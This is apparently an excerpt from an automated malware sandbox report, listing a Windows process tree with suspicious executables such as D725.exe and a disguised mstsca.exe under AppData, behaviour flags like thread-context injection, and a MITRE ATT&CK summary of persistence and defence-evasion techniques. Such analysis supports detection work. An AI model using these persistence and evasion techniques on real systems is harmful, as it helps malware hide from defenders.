C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:1552
-
C:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\D725.exeC:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\D725.exe --Task1⤵
- Suspicious use of SetThreadContext
PID:4588 -
C:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\D725.exeC:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\D725.exe --Task2⤵PID:8096
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies registry class
PID:8064
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x23c1⤵PID:7852
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:3860 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:7592
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:1400
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:2148 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:5604
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:3424 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:7516
-
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
2Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
2File and Directory Permissions Modification
1Install Root Certificate
1Modify Registry
5Virtualization/Sandbox Evasion
2Web Service
1